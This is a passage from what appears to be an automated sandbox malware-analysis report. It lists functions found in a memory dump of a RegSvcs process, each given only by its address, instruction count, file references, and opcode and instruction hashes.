                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                          • Instruction ID: 5c84e9c025c09a1c13f696981375f6f7f51cd34520dbf057fa61280750cd6744
                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                          • Instruction Fuzzy Hash: 4E017CB22005909FE322861DC948F2B7BD9FB84754F0A04AAFA05DB7B2D678DC41C665
                                                                          Function 014D826B Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 101f8a00fe4e0236f1971d5306743b3c533ab31d828e38994769e8a9b1300768
                                                                          • Instruction ID: 758e64e4d1024d5c0e994b7f1c13025e7ad4dfa930f7757282aa1b8aacf1e5a9
                                                                          • Opcode Fuzzy Hash: 101f8a00fe4e0236f1971d5306743b3c533ab31d828e38994769e8a9b1300768
                                                                          • Instruction Fuzzy Hash: B1018472B00906DBDB14EB69DD509BFB7A9FFD1620B16402AD902AB7A4EE30D901C791
                                                                          Function 0158EB50 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: e8b7f6687243be63febf036335b52c884275f27921eecc209c93538c78208f36
                                                                          • Instruction ID: d58a29878c1d8f72df60655741b937c17984231811974c3aeafb2290b2b1b3da
                                                                          • Opcode Fuzzy Hash: e8b7f6687243be63febf036335b52c884275f27921eecc209c93538c78208f36
                                                                          • Instruction Fuzzy Hash: 7601A7B1241701AFD331AF1AD841F06BAB8FF65B50F02482EF316AF390D6B0D9418B55
                                                                          Function 014E2582 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 386d3b69ee0c098423db7aa055420bbab75288b9dd84519616407a1dd0beca3f
                                                                          • Instruction ID: 8999fb2c5bab0b57a01269ed74df4c437017fa170f26eb90df8ff778be37ce4f
                                                                          • Opcode Fuzzy Hash: 386d3b69ee0c098423db7aa055420bbab75288b9dd84519616407a1dd0beca3f
                                                                          • Instruction Fuzzy Hash: 63F0F932641611B7C7319F578D44F077EEDEB94B91F11442EA60597610C670ED01C7A0
                                                                          Function 0150C073 Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                          • Instruction ID: d832d84f33339b9b494660e5d7873c48ca9783cf84d4d95c472522f5e001b4d9
                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                          • Instruction Fuzzy Hash: 41F0C8B3600615ABD325CF4DDC40E57FBEAEBD1A90F048169E515CB360E631ED04CB50
                                                                          Function 014DC310 Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                          • Instruction ID: e84a3a6074030530aab3dbc4c346b14ddd03ea5b47eb7d6b6036606391a6f92e
                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                          • Instruction Fuzzy Hash: BAF0FC732446239BDF32179A48E4B6BA6959FE1A64F1A003FE2059B364CD708D02D6D1
                                                                          Function 0151CA6F Relevance: .0, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                          • Instruction ID: 081db4441957a5841e792b17381e23d0a348ca5ea307bcf41470c0bd35ca5419
                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                          • Instruction Fuzzy Hash: 02018132240685DBE323D65EC805B5DBFD8FF51754F0944AAFE548F6A1D6B9C801C251
                                                                          Function 015B61E5 Relevance: .0, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 25e33d3cbd6edd6f7da478bc698f4e29552b0fab2985f913caed5eb4fa040a0e
                                                                          • Instruction ID: db7eea9833a2bd0a9a4cc4dae78234039b34e979c09ba760aee31915b1a35b16
                                                                          • Opcode Fuzzy Hash: 25e33d3cbd6edd6f7da478bc698f4e29552b0fab2985f913caed5eb4fa040a0e
                                                                          • Instruction Fuzzy Hash: 33014F72A012599FDB04DFA9D445AEEBBF8FF59310F14405AE501AB390D774EA01CBA4
                                                                          Function 015663C0 Relevance: .0, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                          • Instruction ID: 3fc912664ba543a773cf272aefd9ad60a8fd5596918df6c9b68249e3885ec47d
                                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                          • Instruction Fuzzy Hash: 2DF0127210001EBFEF019F95DD80DAF7B7DFB55298B114125FA1196160D631DD21E7A0
                                                                          Function 0156A4B0 Relevance: .0, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b72e1bfcfb6e2d2e7a0a1bead25ce785e8aa0eee94c20d438e23bd404f2fc9ab
                                                                          • Instruction ID: 641021c8c7e0e1564dd95163cdb5d83a51b2a2e27f7677acdffcbe40397ccdf7
                                                                          • Opcode Fuzzy Hash: b72e1bfcfb6e2d2e7a0a1bead25ce785e8aa0eee94c20d438e23bd404f2fc9ab
                                                                          • Instruction Fuzzy Hash: 12019A36111119ABCF229F84DC40EDE7F6AFB4C754F068105FE186A220C332D970EB81
                                                                          Function 014DC0F0 Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f5be0026322d3938fd2a62aaba873fd9d3e26612c9e6ad838685e313ab145b76
                                                                          • Instruction ID: 712fdd768b787794b23c1c7cbec44b30a216a7f5e67c3e14545cfebf46e9cc6d
                                                                          • Opcode Fuzzy Hash: f5be0026322d3938fd2a62aaba873fd9d3e26612c9e6ad838685e313ab145b76
                                                                          • Instruction Fuzzy Hash: 97F0F6712042515BFA1096298CA1B673695E7D0651F25806FE7058B7E1EA70D801C6A4
                                                                          Function 0151656A Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb42fca4dedadf7427cfa01bb6c16faf8ae631223448ef91fbca2589a47c90da
                                                                          • Instruction ID: 932d5cf8b7f7fb1eeb9ea1d5399d108c5f3782a18f4f64b05b1ef836c6dcec6c
                                                                          • Opcode Fuzzy Hash: eb42fca4dedadf7427cfa01bb6c16faf8ae631223448ef91fbca2589a47c90da
                                                                          • Instruction Fuzzy Hash: 6701A4702016819BF333AB2DCD58B2937E8BB50B44F8A0595FA018F6EAE768D481C610
                                                                          Function 0158437C Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                          • Instruction ID: c6a87c42309d81223d3d797c6bbe0618c2be02415d8d340d53091fefe5acc122
                                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                          • Instruction Fuzzy Hash: EFF0E935341D1357FB36BB2E9410B2EBA95BFE0A10B15062C9E11EF680DF20D8808780
                                                                          Function 0156E872 Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                          • Instruction ID: 363475482a7bc53788ebbfa98612bb67f05905a3200f4fb857ed237b56597db5
                                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                          • Instruction Fuzzy Hash: 94F054377125529BD721DE4ECC81F1AB7ACFFD5A60F1A0469A6049F260C760EC01C7D0
                                                                          Function 0156C89D Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3f20f07a677c6d8556e1b9ae3e0ecc18634250a2bed836187b86beb20432da4d
                                                                          • Instruction ID: f5e789b944ed99152b5dea5309b32240124de9eb0d8ae17736a024a05b189489
                                                                          • Opcode Fuzzy Hash: 3f20f07a677c6d8556e1b9ae3e0ecc18634250a2bed836187b86beb20432da4d
                                                                          • Instruction Fuzzy Hash: 60F0AF716053059FC324EF28C445A1ABBE4FF99710F40465EB898DF3D0EA34E901CB96
                                                                          Function 01510854 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                          • Instruction ID: f0b02438560d9f86e91e35e0f11dcc2ae8a6983c9c76d7a556286d74196eaa12
                                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                          • Instruction Fuzzy Hash: 6BF0F072604200EEE715DF22CC00F46B6E9EFA8344F148078A944CB2A4EAB0ED40C654
                                                                          Function 0156C912 Relevance: .0, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9607aa345ff0e396344d46213025ddc62914de0269929e811066d02882d3e3df
                                                                          • Instruction ID: 7fa8c8b68a83d51becd7c81b25f6d78657f451036aa63bade8b77c390679112f
                                                                          • Opcode Fuzzy Hash: 9607aa345ff0e396344d46213025ddc62914de0269929e811066d02882d3e3df
                                                                          • Instruction Fuzzy Hash: A7F04F71A0124A9FDB14EF69C515A5EBBB4FF58300F40805AA955EB395DA38EA01CBA0
                                                                          Function 014E47FB Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb5dde2360414dc156c29e5a5c84537a8a343ba76157fa53430c41ff5cc4d94b
                                                                          • Instruction ID: 55df563781930a3bf51e07404070785edb79de0647b4001a507b16b4f7cb0303
                                                                          • Opcode Fuzzy Hash: cb5dde2360414dc156c29e5a5c84537a8a343ba76157fa53430c41ff5cc4d94b
                                                                          • Instruction Fuzzy Hash: 9AF09A399166E19EE7328B6CC05CB72BBD4BB00B22F0DA96BD589C7632C734D880C651
                                                                          Function 015A0115 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3eabc340c38f278dae35c9fde73df78f0243e1157b452329ec32f5223b1af7d2
                                                                          • Instruction ID: 7b49ddb8faaf75ac85ff88d2b54a71074c730ff2f936d948ca0152cc22c1f8d9
                                                                          • Opcode Fuzzy Hash: 3eabc340c38f278dae35c9fde73df78f0243e1157b452329ec32f5223b1af7d2
                                                                          • Instruction Fuzzy Hash: 1FF0277686B6C206CF325B2C6C902ED2F64B781014F4A1445D4B15F245C674A487D721
                                                                          Function 0151C5ED Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 88687344c4ca95b5a47b0d9da12c204369814fd7ee7ea30448abe860e005f1b2
                                                                          • Instruction ID: fc40c91a4a0ec16ac0992d4e177d38ea6d5d9dff5186cb75e81c56be8b23d10f
                                                                          • Opcode Fuzzy Hash: 88687344c4ca95b5a47b0d9da12c204369814fd7ee7ea30448abe860e005f1b2
                                                                          • Instruction Fuzzy Hash: 73F0E2715916919FF733971CC148F597BE4BB84BA0F08AC26D50A8F516C371E880CA51
                                                                          Function 01522619 Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                          • Instruction ID: cde31e176478619d3cc37b1c9307d2db26cb13e77b3bba1d82e075f8280ed74b
                                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                          • Instruction Fuzzy Hash: 71E092733006122BE7219E598C80F577B6EAFE3B10F04407DB6045E291CAE6AC1982A4
                                                                          Function 01576030 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                          • Instruction ID: cd3f61858136ca367ab0360e81533d1727323f70524fb59034e0fc00d414d6fb
                                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                          • Instruction Fuzzy Hash: FEF01C721046049FF7228F0AE945B56BBF8FB15364F45C42AE6099F661D379EC40CBA4
                                                                          Function 014E0710 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                          • Instruction ID: 61ef00884a7800a22d822cbac7abbdf3c9206c883d9bef30002562a63b786e48
                                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                          • Instruction Fuzzy Hash: 14F0E539304345DBEB16CF19C050AA97BE4FB91350F00006AF8528B361D775E982CB50
                                                                          Function 015149D0 Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                          • Instruction ID: 9001748f9bc707e3db02a51287a8bc05c1d44f28fa6158d1afbb2d3edd1310b0
                                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                          • Instruction Fuzzy Hash: 3FE09233244245ABE3222A598800B7A7BA7BBE07A0F171429E2008F254DBB0DC40C798
                                                                          Function 0158678E Relevance: .0, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                          • Instruction ID: 86db6243ee95f1c53c8da491ded836626d7a8086fa1e4d2aa9c4c3f3d9727397
                                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                          • Instruction Fuzzy Hash: DEE0DF72A00110BBEB22A7998D01F9ABEACEBA0FA0F050059B600EB1E0E530DE00C6D0
                                                                          Function 014E25E0 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2727108612e51867a29b2356b22bf1f71fb40d4a06fbc13b8265bbc27771c119
                                                                          • Instruction ID: 0baca063db1732f623964ac88e76a35135f6ff5161a75603ea52eb61e03ce413
                                                                          • Opcode Fuzzy Hash: 2727108612e51867a29b2356b22bf1f71fb40d4a06fbc13b8265bbc27771c119
                                                                          • Instruction Fuzzy Hash: EEE092331005959BC721BF2ADD05F9A77DAEBB0361F01451AF1555B1A0CA30A810C794
                                                                          Function 0159A456 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                          • Instruction ID: 3c5624e9cfedfbfc61bcef38f050b94473543cbf9b2aeb2ae2e93da5e62e939c
                                                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                          • Instruction Fuzzy Hash: 44E09231010652DFEB326F2AC80CB567AE0FF90711F198C2DE19A1A5F0C7B598C0CA41
                                                                          Function 01564000 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                          • Instruction ID: a4ee7244389357228714ff27102643dbf5a567f602696c476f83808fe866770e
                                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                          • Instruction Fuzzy Hash: 30E0C2343003168FE715CF19C040B667BBABFD5A20F28C068A9488F305EB32E842CB80
                                                                          Function 0151CA38 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b77d70cbfca464b9c7e29cb39c3d2bc3ac409943e1dd6d2b1a34b5d8d030e3c5
                                                                          • Instruction ID: 762cbc394704f7c6a397bd49662133a7da666876b238a5579c13bc1761955e40
                                                                          • Opcode Fuzzy Hash: b77d70cbfca464b9c7e29cb39c3d2bc3ac409943e1dd6d2b1a34b5d8d030e3c5
                                                                          • Instruction Fuzzy Hash: 68D02B334C20316ADB37F659BC04FD73A99BB60260F064861F108DE064D6A5CC81D3C4
                                                                          Function 014D823B Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                          • Instruction ID: 76dff9ac3788294f61e3a04ac52e7001311e6be720042bc4430df7f807768665
                                                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                          • Instruction Fuzzy Hash: 1DE08C32100A22EEDF322F1ADC20B6276A5FBA4B10F11482EE0810A0B48670A882CA44
                                                                          Function 014E2050 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 568ceded86812186dee190f08574dbe6d9ebff50450d523c1492329f54465611
                                                                          • Instruction ID: d86c455aabc4d4e194e95971160a1129ac97b12fc618e6dcda46c559cd15c426
                                                                          • Opcode Fuzzy Hash: 568ceded86812186dee190f08574dbe6d9ebff50450d523c1492329f54465611
                                                                          • Instruction Fuzzy Hash: 08E08C331004906BC621FE6EDD10F5A739EEBB4260F05022AB1559B2A0CA70AC01C794
                                                                          Function 01518A90 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                          • Instruction ID: c4f9d3eaa1cd72b2156ed38ce3d85794d698afca96f131e26d88f308380d2dc9
